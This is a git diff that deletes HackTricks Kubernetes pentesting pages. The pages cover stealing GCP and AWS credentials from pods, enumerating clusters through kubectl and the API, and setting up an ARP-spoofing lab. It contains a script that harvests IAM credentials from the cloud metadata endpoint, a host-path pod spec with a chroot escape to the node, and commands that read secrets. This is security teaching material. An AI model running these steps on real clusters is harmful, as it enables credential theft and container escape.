- -Support HackTricks and get benefits! - -- Do you work in a **cybersecurity company**? Do you want to see your **company advertised in HackTricks**? or do you want to have access to the **latest version of the PEASS or download HackTricks in PDF**? Check the [**SUBSCRIPTION PLANS**](https://github.com/sponsors/carlospolop)! - -- Discover [**The PEASS Family**](https://opensea.io/collection/the-peass-family), our collection of exclusive [**NFTs**](https://opensea.io/collection/the-peass-family) - -- Get the [**official PEASS & HackTricks swag**](https://peass.creator-spring.com) - -- **Join the** [**πŸ’¬**](https://emojipedia.org/speech-balloon/) [**Discord group**](https://discord.gg/hRep4RUj7f) or the [**telegram group**](https://t.me/peass) or **follow** me on **Twitter** [**🐦**](https://github.com/carlospolop/hacktricks/tree/7af18b62b3bdc423e11444677a6a73d4043511e9/\[https:/emojipedia.org/bird/README.md)[**@carlospolopm**](https://twitter.com/carlospolopm)**.** - -- **Share your hacking tricks by submitting PRs to the** [**hacktricks github repo**](https://github.com/carlospolop/hacktricks)**.** - -
- - diff --git a/cloud-security/pentesting-kubernetes/kubernetes-access-to-other-clouds.md b/cloud-security/pentesting-kubernetes/kubernetes-access-to-other-clouds.md deleted file mode 100644 index af1fc55f0..000000000 --- a/cloud-security/pentesting-kubernetes/kubernetes-access-to-other-clouds.md +++ /dev/null @@ -1,254 +0,0 @@ - - -
- -Support HackTricks and get benefits! - -- Do you work in a **cybersecurity company**? Do you want to see your **company advertised in HackTricks**? or do you want to have access to the **latest version of the PEASS or download HackTricks in PDF**? Check the [**SUBSCRIPTION PLANS**](https://github.com/sponsors/carlospolop)! - -- Discover [**The PEASS Family**](https://opensea.io/collection/the-peass-family), our collection of exclusive [**NFTs**](https://opensea.io/collection/the-peass-family) - -- Get the [**official PEASS & HackTricks swag**](https://peass.creator-spring.com) - -- **Join the** [**πŸ’¬**](https://emojipedia.org/speech-balloon/) [**Discord group**](https://discord.gg/hRep4RUj7f) or the [**telegram group**](https://t.me/peass) or **follow** me on **Twitter** [**🐦**](https://github.com/carlospolop/hacktricks/tree/7af18b62b3bdc423e11444677a6a73d4043511e9/\[https:/emojipedia.org/bird/README.md)[**@carlospolopm**](https://twitter.com/carlospolopm)**.** - -- **Share your hacking tricks by submitting PRs to the** [**hacktricks github repo**](https://github.com/carlospolop/hacktricks)**.** - -
- - -# GCP - -If you are running a k8s cluster inside GCP you will probably want that some application running inside the cluster has some access to GCP. There are 2 common ways of doing that: - -## Mounting GCP-SA keys as secret - -A common way to give **access to a kubernetes application to GCP** is to: - -* Create a GCP Service Account -* Bind on it the desired permissions -* Download a json key of the created SA -* Mount it as a secret inside the pod -* Set the GOOGLE\_APPLICATION\_CREDENTIALS environment variable pointing to the path where the json is. - -{% hint style="warning" %} -Therefore, as an **attacker**, if you compromise a container inside a pod, you should check for that **env** **variable** and **json** **files** with GCP credentials. -{% endhint %} - -## GKE Workload Identity - -With Workload Identity, we can configure a[ Kubernetes service account](https://kubernetes.io/docs/tasks/configure-pod-container/configure-service-account/) to act as a[ Google service account](https://cloud.google.com/iam/docs/understanding-service-accounts). Pods running with the Kubernetes service account will automatically authenticate as the Google service account when accessing Google Cloud APIs. - -The **first series of steps** to enable this behaviour is to **enable Workload Identity in GCP** ([**steps**](https://medium.com/zeotap-customer-intelligence-unleashed/gke-workload-identity-a-secure-way-for-gke-applications-to-access-gcp-services-f880f4e74e8c)) and create the GCP SA you want k8s to impersonate. - -The **second steps** is to relate a K8s SA (KSA) with the GCP SA (GSA): - -* Create the KSA (normally in the **annotations appear the email of the GSA**) and use it in the pod you would like to: - -```yaml -# serviceAccount.yaml -apiVersion: v1 -kind: ServiceAccount -metadata: - annotations: - iam.gke.io/gcp-service-account: $GSA-NAME@PROJECT-ID.iam.gserviceaccount.com - name: $APPNAME - namespace: $NAMESPACE -``` - -* Create the KSA - GSA Binding: - -```bash -gcloud iam service-accounts \ - --role roles/iam.workloadIdentityUser \ - --member "serviceAccount:PROJECT-ID.svc.id.goog[$NAMESPACE/$KSA-NAME]" \ - $GSA-NAME@PROJECT-ID.iam.gserviceaccount.com -``` - -Note how you are creating a binding and in the **member field you can find the namespace and KSA name**. - -{% hint style="warning" %} -As an attacker inside K8s you should **search for SAs** with the **`iam.gke.io/gcp-service-account` annotation** as that indicates that the SA can access something in GCP. Another option would be to try to abuse each KSA in the cluster and check if it has access.\ -From GCP is always interesting to enumerate the bindings and know **which access are you giving to SAs inside Kubernetes**. -{% endhint %} - -This is a script to easily **iterate over the all the pods** definitions **looking** for that **annotation**: - -```bash -for ns in `kubectl get namespaces -o custom-columns=NAME:.metadata.name | grep -v NAME`; do - for pod in `kubectl get pods -n "$ns" -o custom-columns=NAME:.metadata.name | grep -v NAME`; do - echo "Pod: $ns/$pod" - kubectl get pod "$pod" -n "$ns" -o yaml | grep "gcp-service-account" - echo "" - echo "" - done -done | grep -B 1 "gcp-service-account" -``` - -# AWS - -## Kiam & Kube2IAM (IAM role for Pods) - -An (outdated) way to give IAM Roles to Pods is to use a [**Kiam**](https://github.com/uswitch/kiam) or a [**Kube2IAM**](https://github.com/jtblin/kube2iam) **server.** Basically you will need to run a **daemonset** in your cluster with a **kind of privileged IAM role**. This daemonset will be the one that will give access to IAM roles to the pods that need it. - -First of all you need to configure **which roles can be accessed inside the namespace**, and you do that with an annotation inside the namespace object: - -{% code title="Kiam" %} -```yaml -kind: Namespace -metadata: - name: iam-example - annotations: - iam.amazonaws.com/permitted: ".*" -``` -{% endcode %} - -{% code title="Kube2iam" %} -```yaml -apiVersion: v1 -kind: Namespace -metadata: - annotations: - iam.amazonaws.com/allowed-roles: | - ["role-arn"] - name: default -``` -{% endcode %} - -Once the namespace is configured with the IAM roles the Pods can have you can **indicate the role you want on each pod definition with something like**: - -{% code title="Kiam & Kube2iam" %} -```yaml -kind: Pod -metadata: - name: foo - namespace: external-id-example - annotations: - iam.amazonaws.com/role: reportingdb-reader -``` -{% endcode %} - -{% hint style="warning" %} -As an attacker, if you **find these annotations** in pods or namespaces or a kiam/kube2iam server running (in kube-system probably) you can **impersonate every r**ole that is already **used by pods** and more (if you have access to AWS account enumerate the roles). -{% endhint %} - -### Create Pod with IAM Role - -{% hint style="info" %} -The IAM role to indicate must be in the same AWS account as the kiam/kube2iam role and that role must be able to access it. -{% endhint %} - -```yaml -echo 'apiVersion: v1 -kind: Pod -metadata: - annotations: - iam.amazonaws.com/role: transaction-metadata - name: alpine - namespace: eevee -spec: - containers: - - name: alpine - image: alpine - command: ["/bin/sh"] - args: ["-c", "sleep 100000"]' | kubectl apply -f - -``` - -## Workflow of IAM role for Service Accounts via OIDC - -This is the recommended way by AWS. - -1. First of all you need to [create an OIDC provider for the cluster](https://docs.aws.amazon.com/eks/latest/userguide/enable-iam-roles-for-service-accounts.html). -2. Then you create an IAM role with the permissions the SA will require. -3. Create a [trust relationship between the IAM role and the SA](https://docs.aws.amazon.com/eks/latest/userguide/iam-roles-for-service-accounts-technical-overview.html) name (or the namespaces giving access to the role to all the SAs of the namespace). _The trust relationship will mainly check the OIDC provider name, the namespace name and the SA name_. -4. Finally, **create a SA with an annotation indicating the ARN of the role**, and the pods running with that SA will have **access to the token of the role**. The **token** is **written** inside a file and the path is specified in **`AWS_WEB_IDENTITY_TOKEN_FILE`** (default: `/var/run/secrets/eks.amazonaws.com/serviceaccount/token`) - -(You can find an example of this configuration [here](https://blogs.halodoc.io/iam-roles-for-service-accounts-2/)) - -```yaml -apiVersion: v1 -kind: ServiceAccount -metadata: - annotations: - eks.amazonaws.com/role-arn: arn:aws-cn:iam::ACCOUNT_ID:role/IAM_ROLE_NAME -``` - -{% hint style="warning" %} -As an attacker, if you can enumerate a K8s cluster, check for **service accounts with that annotation** to **escalate to AWS**. To do so, just **exec/create** a **pod** using one of the IAM **privileged service accounts** and steal the token. - -Moreover, if you are inside a pod, check for env variables like **AWS\_ROLE\_ARN** and **AWS\_WEB\_IDENTITY\_TOKEN.** - - -{% endhint %} - -## Find Pods a SAs with IAM Roles in the Cluster - -This is a script to easily **iterate over the all the pods and sas** definitions **looking** for that **annotation**: - -```bash -for ns in `kubectl get namespaces -o custom-columns=NAME:.metadata.name | grep -v NAME`; do - for pod in `kubectl get pods -n "$ns" -o custom-columns=NAME:.metadata.name | grep -v NAME`; do - echo "Pod: $ns/$pod" - kubectl get pod "$pod" -n "$ns" -o yaml | grep "amazonaws.com" - echo "" - echo "" - done - for sa in `kubectl get serviceaccounts -n "$ns" -o custom-columns=NAME:.metadata.name | grep -v NAME`; do - echo "SA: $ns/$sa" - kubectl get serviceaccount "$sa" -n "$ns" -o yaml | grep "amazonaws.com" - echo "" - echo "" - done -done | grep -B 1 "amazonaws.com" -``` - -## Node IAM Role - -The previos section was about how to steal IAM Roles with pods, but note that a **Node of the** K8s cluster is going to be an **instance inside the cloud**. This means that the Node is highly probable going to **have a new IAM role you can steal** (_note that usually all the nodes of a K8s cluster will have the same IAM role, so it might not be worth it to try to check on each node_). - -There is however an important requirement to access the metadata endpoint from the node, you need to be in the node (ssh session?) or at least have the same network: - -```bash -kubectl run NodeIAMStealer --restart=Never -ti --rm --image lol --overrides '{"spec":{"hostNetwork": true, "containers":[{"name":"1","image":"alpine","stdin": true,"tty":true,"imagePullPolicy":"IfNotPresent"}]}}' -``` - -## Steal IAM Role Token - -Previously we have discussed how to **attach IAM Roles to Pods** or even how to **escape to the Node to steal the IAM Role** the instance has attached to it. - -You can use the following script to **steal** your new hard worked **IAM role credentials**: - -```bash -IAM_ROLE_NAME=$(curl http://169.254.169.254/latest/meta-data/iam/security-credentials/ 2>/dev/null || wget http://169.254.169.254/latest/meta-data/iam/security-credentials/ -O - 2>/dev/null) -if [ "$IAM_ROLE_NAME" ]; then - echo "IAM Role discovered: $IAM_ROLE_NAME" - if ! echo "$IAM_ROLE_NAME" | grep -q "empty role"; then - echo "Credentials:" - curl "http://169.254.169.254/latest/meta-data/iam/security-credentials/$IAM_ROLE_NAME" 2>/dev/null || wget "http://169.254.169.254/latest/meta-data/iam/security-credentials/$IAM_ROLE_NAME" -O - 2>/dev/null - fi -fi -``` - -# References - -* [https://medium.com/zeotap-customer-intelligence-unleashed/gke-workload-identity-a-secure-way-for-gke-applications-to-access-gcp-services-f880f4e74e8c](https://medium.com/zeotap-customer-intelligence-unleashed/gke-workload-identity-a-secure-way-for-gke-applications-to-access-gcp-services-f880f4e74e8c) -* [https://blogs.halodoc.io/iam-roles-for-service-accounts-2/](https://blogs.halodoc.io/iam-roles-for-service-accounts-2/) - - -
- -Support HackTricks and get benefits! - -- Do you work in a **cybersecurity company**? Do you want to see your **company advertised in HackTricks**? or do you want to have access to the **latest version of the PEASS or download HackTricks in PDF**? Check the [**SUBSCRIPTION PLANS**](https://github.com/sponsors/carlospolop)! - -- Discover [**The PEASS Family**](https://opensea.io/collection/the-peass-family), our collection of exclusive [**NFTs**](https://opensea.io/collection/the-peass-family) - -- Get the [**official PEASS & HackTricks swag**](https://peass.creator-spring.com) - -- **Join the** [**πŸ’¬**](https://emojipedia.org/speech-balloon/) [**Discord group**](https://discord.gg/hRep4RUj7f) or the [**telegram group**](https://t.me/peass) or **follow** me on **Twitter** [**🐦**](https://github.com/carlospolop/hacktricks/tree/7af18b62b3bdc423e11444677a6a73d4043511e9/\[https:/emojipedia.org/bird/README.md)[**@carlospolopm**](https://twitter.com/carlospolopm)**.** - -- **Share your hacking tricks by submitting PRs to the** [**hacktricks github repo**](https://github.com/carlospolop/hacktricks)**.** - -
- - diff --git a/cloud-security/pentesting-kubernetes/kubernetes-enumeration.md b/cloud-security/pentesting-kubernetes/kubernetes-enumeration.md deleted file mode 100644 index ed1996582..000000000 --- a/cloud-security/pentesting-kubernetes/kubernetes-enumeration.md +++ /dev/null @@ -1,504 +0,0 @@ - - -
- -Support HackTricks and get benefits! - -- Do you work in a **cybersecurity company**? Do you want to see your **company advertised in HackTricks**? or do you want to have access to the **latest version of the PEASS or download HackTricks in PDF**? Check the [**SUBSCRIPTION PLANS**](https://github.com/sponsors/carlospolop)! - -- Discover [**The PEASS Family**](https://opensea.io/collection/the-peass-family), our collection of exclusive [**NFTs**](https://opensea.io/collection/the-peass-family) - -- Get the [**official PEASS & HackTricks swag**](https://peass.creator-spring.com) - -- **Join the** [**πŸ’¬**](https://emojipedia.org/speech-balloon/) [**Discord group**](https://discord.gg/hRep4RUj7f) or the [**telegram group**](https://t.me/peass) or **follow** me on **Twitter** [**🐦**](https://github.com/carlospolop/hacktricks/tree/7af18b62b3bdc423e11444677a6a73d4043511e9/\[https:/emojipedia.org/bird/README.md)[**@carlospolopm**](https://twitter.com/carlospolopm)**.** - -- **Share your hacking tricks by submitting PRs to the** [**hacktricks github repo**](https://github.com/carlospolop/hacktricks)**.** - -
- - -# Kubernetes Tokens - -If you have compromised access to a machine the user may have access to some Kubernetes platform. The token is usually located in a file pointed by the **env var `KUBECONFIG`** or **inside `~/.kube`**. - -In this folder you might find config files with **tokens and configurations to connect to the API server**. In this folder you can also find a cache folder with information previously retrieved. - -If you have compromised a pod inside a kubernetes environment, there are other places where you can find tokens and information about the current K8 env: - -## Service Account Tokens - -Before continuing, if you don't know what is a service in Kubernetes I would suggest you to [**follow this link and read at least the information about Kubernetes architecture**](../../pentesting/pentesting-kubernetes/#architecture)**.** - -Taken from the Kubernetes [documentation](https://kubernetes.io/docs/tasks/configure-pod-container/configure-service-account/#use-the-default-service-account-to-access-the-api-server): - -_β€œWhen you create a pod, if you do not specify a service account, it is automatically assigned the_ default _service account in the same namespace.”_ - -**ServiceAccount** is an object managed by Kubernetes and used to provide an identity for processes that run in a pod.\ -Every service account has a secret related to it and this secret contains a bearer token. This is a JSON Web Token (JWT), a method for representing claims securely between two parties. - -Usually **one** of the directories: - -* `/run/secrets/kubernetes.io/serviceaccount` -* `/var/run/secrets/kubernetes.io/serviceaccount` -* `/secrets/kubernetes.io/serviceaccount` - -contain the files: - -* **ca.crt**: It's the ca certificate to check kubernetes communications -* **namespace**: It indicates the current namespace -* **token**: It contains the **service token** of the current pod. - -Now that you have the token, you can find the API server inside the environment variable **`KUBECONFIG`**. For more info run `(env | set) | grep -i "kuber|kube`**`"`** - -The service account token is being signed by the key residing in the file **sa.key** and validated by **sa.pub**. - -Default location on **Kubernetes**: - -* /etc/kubernetes/pki - -Default location on **Minikube**: - -* /var/lib/localkube/certs - -## Hot Pods - -_**Hot pods are**_ pods containing a privileged service account token. A privileged service account token is a token that has permission to do privileged tasks such as listing secrets, creating pods, etc. - -# RBAC - -If you don't know what is **RBAC**, [**read this section**](../../pentesting/pentesting-kubernetes/#cluster-hardening-rbac). - -# Enumeration CheatSheet - -In order to enumerate a K8s environment you need a couple of this: - -* A **valid authentication token**. In the previous section we saw where to search for a user token and for a service account token. -* The **address (**_**https://host:port**_**) of the Kubernetes API**. This can be usually found in the environment variables and/or in the kube config file. -* **Optional**: The **ca.crt to verify the API server**. This can be found in the same places the token can be found. This is useful to verify the API server certificate, but using `--insecure-skip-tls-verify` with `kubectl` or `-k` with `curl` you won't need this. - -With those details you can **enumerate kubernetes**. If the **API** for some reason is **accessible** through the **Internet**, you can just download that info and enumerate the platform from your host. - -However, usually the **API server is inside an internal network**, therefore you will need to **create a tunnel** through the compromised machine to access it from your machine, or you can **upload the** [**kubectl**](https://kubernetes.io/docs/tasks/tools/install-kubectl-linux/#install-kubectl-binary-with-curl-on-linux) binary, or use **`curl/wget/anything`** to perform raw HTTP requests to the API server. - -## Differences between `list` and `get` verbs - -With **`get`** permissions you can access information of specific assets (_`describe` option in `kubectl`_) API: - -``` -GET /apis/apps/v1/namespaces/{namespace}/deployments/{name} -``` - -If you have the **`list`** permission, you are allowed to execute API requests to list a type of asset (_`get` option in `kubectl`_): - -```bash -#In a namespace -GET /apis/apps/v1/namespaces/{namespace}/deployments -#In all namespaces -GET /apis/apps/v1/deployments -``` - -If you have the **`watch`** permission, you are allowed to execute API requests to monitor assets: - -``` -GET /apis/apps/v1/deployments?watch=true -GET /apis/apps/v1/watch/namespaces/{namespace}/deployments?watch=true -GET /apis/apps/v1/watch/namespaces/{namespace}/deployments/{name} [DEPRECATED] -GET /apis/apps/v1/watch/namespaces/{namespace}/deployments [DEPRECATED] -GET /apis/apps/v1/watch/deployments [DEPRECATED] -``` - -They open a streaming connection that returns you the full manifest of a Deployment whenever it changes (or when a new one is created). - -{% hint style="danger" %} -The following `kubectl` commands indicates just how to list the objects. If you want to access the data you need to use `describe` instead of `get` -{% endhint %} - -## Using curl - -From inside a pod you can use several env variables: - -```bash -export APISERVER=${KUBERNETES_SERVICE_HOST}:${KUBERNETES_SERVICE_PORT_HTTPS} -export SERVICEACCOUNT=/var/run/secrets/kubernetes.io/serviceaccount -export NAMESPACE=$(cat ${SERVICEACCOUNT}/namespace) -export TOKEN=$(cat ${SERVICEACCOUNT}/token) -export CACERT=${SERVICEACCOUNT}/ca.crt -alias kurl="curl --cacert ${CACERT} --header \"Authorization: Bearer ${TOKEN}\"" -``` - -## Using kubectl - -Having the token and the address of the API server you use kubectl or curl to access it as indicated here: - -```bash -alias k='kubectl --token=$TOKEN --server=$APISERVER --insecure-skip-tls-verify=true' -``` - -You can find an [**official kubectl cheatsheet here**](https://kubernetes.io/docs/reference/kubectl/cheatsheet/). The goal of the following sections is to present in ordered manner different options to enumerate and understand the new K8s you have obtained access to. - -To find the HTTP request that `kubectl` sends you can use the parameter `-v=8` - -## Current Configuration - -{% tabs %} -{% tab title="Kubectl" %} -```bash -kubectl config get-users -kubectl config get-contexts -kubectl config get-clusters -kubectl config current-context - -# Change namespace -kubectl config set-context --current --namespace= -``` -{% endtab %} -{% endtabs %} - -If you managed to steal some users credentials you can **configure them locally** using something like: - -```bash -kubectl config set-credentials USER_NAME \ - --auth-provider=oidc \ - --auth-provider-arg=idp-issuer-url=( issuer url ) \ - --auth-provider-arg=client-id=( your client id ) \ - --auth-provider-arg=client-secret=( your client secret ) \ - --auth-provider-arg=refresh-token=( your refresh token ) \ - --auth-provider-arg=idp-certificate-authority=( path to your ca certificate ) \ - --auth-provider-arg=id-token=( your id_token ) -``` - -## Get Supported Resources - -With this info you will know all the services you can list - -{% tabs %} -{% tab title="kubectl" %} -```bash -k api-resources --namespaced=true #Resources specific to a namespace -k api-resources --namespaced=false #Resources NOT specific to a namespace -``` -{% endtab %} -{% endtabs %} - -## Get Current Privileges - -{% tabs %} -{% tab title="kubectl" %} -```bash -k auth can-i --list #Get privileges in general -k auth can-i --list -n custnamespace #Get privileves in custnamespace - -# Get service account permissions -k auth can-i --list --as=system:serviceaccount:: -n -``` -{% endtab %} - -{% tab title="API" %} -```bash -kurl -i -s -k -X $'POST' \ - -H $'Content-Type: application/json' \ - --data-binary $'{\"kind\":\"SelfSubjectRulesReview\",\"apiVersion\":\"authorization.k8s.io/v1\",\"metadata\":{\"creationTimestamp\":null},\"spec\":{\"namespace\":\"default\"},\"status\":{\"resourceRules\":null,\"nonResourceRules\":null,\"incomplete\":false}}\x0a' \ - "https://$APISERVER/apis/authorization.k8s.io/v1/selfsubjectrulesreviews" -``` -{% endtab %} -{% endtabs %} - -You can learn more about **Kubernetes RBAC** in - -{% content-ref url="../../pentesting/pentesting-kubernetes/kubernetes-role-based-access-control-rbac.md" %} -[kubernetes-role-based-access-control-rbac.md](../../pentesting/pentesting-kubernetes/kubernetes-role-based-access-control-rbac.md) -{% endcontent-ref %} - -**Once you know which privileges** you have, check the following page to figure out **if you can abuse them** to escalate privileges: - -{% content-ref url="abusing-roles-clusterroles-in-kubernetes/" %} -[abusing-roles-clusterroles-in-kubernetes](abusing-roles-clusterroles-in-kubernetes/) -{% endcontent-ref %} - -## Get Others roles - -{% tabs %} -{% tab title="kubectl" %} -```bash -k get roles -k get clusterroles -``` -{% endtab %} - -{% tab title="API" %} -```bash -kurl -k -v "https://$APISERVER/apis/authorization.k8s.io/v1/namespaces/eevee/roles?limit=500" -kurl -k -v "https://$APISERVER/apis/authorization.k8s.io/v1/namespaces/eevee/clusterroles?limit=500" -``` -{% endtab %} -{% endtabs %} - -## Get namespaces - -Kubernetes supports **multiple virtual clusters** backed by the same physical cluster. These virtual clusters are called **namespaces**. - -{% tabs %} -{% tab title="kubectl" %} -```bash -k get namespaces -``` -{% endtab %} - -{% tab title="API" %} -```bash -kurl -k -v https://$APISERVER/api/v1/namespaces/ -``` -{% endtab %} -{% endtabs %} - -## Get secrets - -{% tabs %} -{% tab title="kubectl" %} -``` -k get secrets -o yaml -k get secrets -o yaml -n custnamespace -``` -{% endtab %} - -{% tab title="API" %} -```bash -kurl -v https://$APISERVER/api/v1/namespaces/default/secrets/ - -curl -v https://$APISERVER/api/v1/namespaces/custnamespace/secrets/ -``` -{% endtab %} -{% endtabs %} - -If you can read secrets you can use the following lines to get the privileges related to each to token: - -```bash -for token in `k describe secrets -n kube-system | grep "token:" | cut -d " " -f 7`; do echo $token; k --token $token auth can-i --list; echo; done -``` - -## Get Service Accounts - -As discussed at the begging of this page **when a pod is run a service account is usually assigned to it**. Therefore, listing the service accounts, their permissions and where are they running may allow a user to escalate privileges. - -{% tabs %} -{% tab title="kubectl" %} -```bash -k get serviceaccounts -``` -{% endtab %} - -{% tab title="API" %} -```bash -curl -k -v https://$APISERVER/api/v1/namespaces/{namespace}/serviceaccounts -``` -{% endtab %} -{% endtabs %} - -## Get Deployments - -The deployments specify the **components** that need to be **run**. - -{% tabs %} -{% tab title="kubectl" %} -``` -.k get deployments -k get deployments -n custnamespace -``` -{% endtab %} - -{% tab title="API" %} -```bash -curl -v https://$APISERVER/api/v1/namespaces//deployments/ -``` -{% endtab %} -{% endtabs %} - -## Get Pods - -The Pods are the actual **containers** that will **run**. - -{% tabs %} -{% tab title="kubectl" %} -``` -k get pods -k get pods -n custnamespace -``` -{% endtab %} - -{% tab title="API" %} -```bash -curl -v https://$APISERVER/api/v1/namespaces//pods/ -``` -{% endtab %} -{% endtabs %} - -## Get Services - -Kubernetes **services** are used to **expose a service in a specific port and IP** (which will act as load balancer to the pods that are actually offering the service). This is interesting to know where you can find other services to try to attack. - -{% tabs %} -{% tab title="kubectl" %} -``` -k get services -k get services -n custnamespace -``` -{% endtab %} - -{% tab title="API" %} -```bash -curl -v https://$APISERVER/api/v1/namespaces/default/services/ -``` -{% endtab %} -{% endtabs %} - -## Get nodes - -Get all the **nodes configured inside the cluster**. - -{% tabs %} -{% tab title="kubectl" %} -``` -k get nodes -``` -{% endtab %} - -{% tab title="API" %} -```bash -curl -v https://$APISERVER/api/v1/nodes/ -``` -{% endtab %} -{% endtabs %} - -## Get DaemonSets - -**DaeamonSets** allows to ensure that a **specific pod is running in all the nodes** of the cluster (or in the ones selected). If you delete the DaemonSet the pods managed by it will be also removed. - -{% tabs %} -{% tab title="kubectl" %} -``` -k get daemonsets -``` -{% endtab %} - -{% tab title="API" %} -```bash -curl -v https://$APISERVER/apis/extensions/v1beta1/namespaces/default/daemonsets -``` -{% endtab %} -{% endtabs %} - -## Get cronjob - -Cron jobs allows to schedule using crontab like syntax the launch of a pod that will perform some action. - -{% tabs %} -{% tab title="kubectl" %} -``` -k get cronjobs -``` -{% endtab %} - -{% tab title="API" %} -```bash -curl -v https://$APISERVER/apis/batch/v1beta1/namespaces//cronjobs -``` -{% endtab %} -{% endtabs %} - -## Get "all" - -{% tabs %} -{% tab title="kubectl" %} -``` -k get all -``` -{% endtab %} -{% endtabs %} - -## **Get Pods consumptions** - -{% tabs %} -{% tab title="kubectl" %} -``` -k top pod --all-namespaces -``` -{% endtab %} -{% endtabs %} - -## Escaping from the pod - -If you are able to create new pods you might be able to escape from them to the node. In order to do so you need to create a new pod using a yaml file, switch to the created pod and then chroot into the node's system. You can use already existing pods as reference for the yaml file since they display existing images and pathes. - -```bash -kubectl get pod [-n ] -o yaml -``` - -Then you create your attack.yaml file - -```yaml -apiVersion: v1 -kind: Pod -metadata: - labels: - run: attacker-pod - name: attacker-pod - namespace: default -spec: - volumes: - - name: host-fs - hostPath: - path: / - containers: - - image: ubuntu - imagePullPolicy: Always - name: attacker-pod - volumeMounts: - - name: host-fs - mountPath: /root - restartPolicy: Never -``` - -[original yaml source](https://gist.github.com/abhisek/1909452a8ab9b8383a2e94f95ab0ccba) - -After that you create the pod - -```bash -kubectl apply -f attacker.yaml [-n ] -``` - -Now you can switch to the created pod as follows - -```bash -kubectl exec -it attacker-pod [-n ] -- bash # attacker-pod is the name defined in the yaml file -``` - -And finally you chroot into the node's system - -```bash -chroot /root /bin/bash -``` - -Information obtained from: [Kubernetes Namespace Breakout using Insecure Host Path Volume β€” Part 1](https://blog.appsecco.com/kubernetes-namespace-breakout-using-insecure-host-path-volume-part-1-b382f2a6e216) [Attacking and Defending Kubernetes: Bust-A-Kube – Episode 1](https://www.inguardians.com/attacking-and-defending-kubernetes-bust-a-kube-episode-1/) - -# References - -{% embed url="https://www.cyberark.com/resources/threat-research-blog/kubernetes-pentest-methodology-part-3" %} - - -
- -Support HackTricks and get benefits! - -- Do you work in a **cybersecurity company**? Do you want to see your **company advertised in HackTricks**? or do you want to have access to the **latest version of the PEASS or download HackTricks in PDF**? Check the [**SUBSCRIPTION PLANS**](https://github.com/sponsors/carlospolop)! - -- Discover [**The PEASS Family**](https://opensea.io/collection/the-peass-family), our collection of exclusive [**NFTs**](https://opensea.io/collection/the-peass-family) - -- Get the [**official PEASS & HackTricks swag**](https://peass.creator-spring.com) - -- **Join the** [**πŸ’¬**](https://emojipedia.org/speech-balloon/) [**Discord group**](https://discord.gg/hRep4RUj7f) or the [**telegram group**](https://t.me/peass) or **follow** me on **Twitter** [**🐦**](https://github.com/carlospolop/hacktricks/tree/7af18b62b3bdc423e11444677a6a73d4043511e9/\[https:/emojipedia.org/bird/README.md)[**@carlospolopm**](https://twitter.com/carlospolopm)**.** - -- **Share your hacking tricks by submitting PRs to the** [**hacktricks github repo**](https://github.com/carlospolop/hacktricks)**.** - -
- - diff --git a/cloud-security/pentesting-kubernetes/kubernetes-network-attacks.md b/cloud-security/pentesting-kubernetes/kubernetes-network-attacks.md deleted file mode 100644 index 79acbba35..000000000 --- a/cloud-security/pentesting-kubernetes/kubernetes-network-attacks.md +++ /dev/null @@ -1,318 +0,0 @@ -# Kubernetes Network Attacks - -
- -Support HackTricks and get benefits! - -- Do you work in a **cybersecurity company**? Do you want to see your **company advertised in HackTricks**? or do you want to have access to the **latest version of the PEASS or download HackTricks in PDF**? Check the [**SUBSCRIPTION PLANS**](https://github.com/sponsors/carlospolop)! - -- Discover [**The PEASS Family**](https://opensea.io/collection/the-peass-family), our collection of exclusive [**NFTs**](https://opensea.io/collection/the-peass-family) - -- Get the [**official PEASS & HackTricks swag**](https://peass.creator-spring.com) - -- **Join the** [**πŸ’¬**](https://emojipedia.org/speech-balloon/) [**Discord group**](https://discord.gg/hRep4RUj7f) or the [**telegram group**](https://t.me/peass) or **follow** me on **Twitter** [**🐦**](https://github.com/carlospolop/hacktricks/tree/7af18b62b3bdc423e11444677a6a73d4043511e9/\[https:/emojipedia.org/bird/README.md)[**@carlospolopm**](https://twitter.com/carlospolopm)**.** - -- **Share your hacking tricks by submitting PRs to the** [**hacktricks github repo**](https://github.com/carlospolop/hacktricks)**.** - -
- -## Introduction - -Kubernetes by default **connects** all the **containers running in the same node** (even if they belong to different namespaces) down to **Layer 2** (ethernet). This allows a malicious containers to perform an [**ARP spoofing attack**](../../generic-methodologies-and-resources/pentesting-network/#arp-spoofing) to the containers on the same node and capture their traffic. - -In the scenario 4 machines are going to be created: - -* ubuntu-pe: Privileged machine to escape to the node and check metrics (not needed for the attack) -* **ubuntu-attack**: **Malicious** container in default namespace -* **ubuntu-victim**: **Victim** machine in kube-system namespace -* **mysql**: **Victim** machine in default namespace - -```yaml -echo 'apiVersion: v1 -kind: Pod -metadata: - name: ubuntu-pe -spec: - containers: - - image: ubuntu - command: - - "sleep" - - "360000" - imagePullPolicy: IfNotPresent - name: ubuntu-pe - securityContext: - allowPrivilegeEscalation: true - privileged: true - runAsUser: 0 - volumeMounts: - - mountPath: /host - name: host-volume - restartPolicy: Never - hostIPC: true - hostNetwork: true - hostPID: true - volumes: - - name: host-volume - hostPath: - path: / ---- -apiVersion: v1 -kind: Pod -metadata: - name: ubuntu-attack - labels: - app: ubuntu -spec: - containers: - - image: ubuntu - command: - - "sleep" - - "360000" - imagePullPolicy: IfNotPresent - name: ubuntu-attack - restartPolicy: Never ---- -apiVersion: v1 -kind: Pod -metadata: - name: ubuntu-victim - namespace: kube-system -spec: - containers: - - image: ubuntu - command: - - "sleep" - - "360000" - imagePullPolicy: IfNotPresent - name: ubuntu-victim - restartPolicy: Never ---- -apiVersion: v1 -kind: Pod -metadata: - name: mysql -spec: - containers: - - image: mysql:5.6 - ports: - - containerPort: 3306 - imagePullPolicy: IfNotPresent - name: mysql - env: - - name: MYSQL_ROOT_PASSWORD - value: mysql - restartPolicy: Never' | kubectl apply -f - -``` - -```bash -kubectl exec -it ubuntu-attack -- bash -c "apt update; apt install -y net-tools python3-pip python3 ngrep nano dnsutils; pip3 install scapy; bash" -kubectl exec -it ubuntu-victim -n kube-system -- bash -c "apt update; apt install -y net-tools curl netcat mysql-client; bash" -kubectl exec -it mysql bash -- bash -c "apt update; apt install -y net-tools; bash" -``` - -## Basic Kubernetes Networking - -If you want more details about the networking topics introduced here, go to the references. - -### ARP - -Generally speaking, **pod-to-pod networking inside the node** is available via a **bridge** that connects all pods. This bridge is called β€œ**cbr0**”. (Some network plugins will install their own bridge.) The **cbr0 can also handle ARP** (Address Resolution Protocol) resolution. When an incoming packet arrives at cbr0, it can resolve the destination MAC address using ARP. - -![](<../../.gitbook/assets/image (637) (1).png>) - -This fact implies that, by default, **every pod running in the same node** is going to be able to **communicate** with any other pod in the same node (independently of the namespace) at ethernet level (layer 2). - -{% hint style="warning" %} 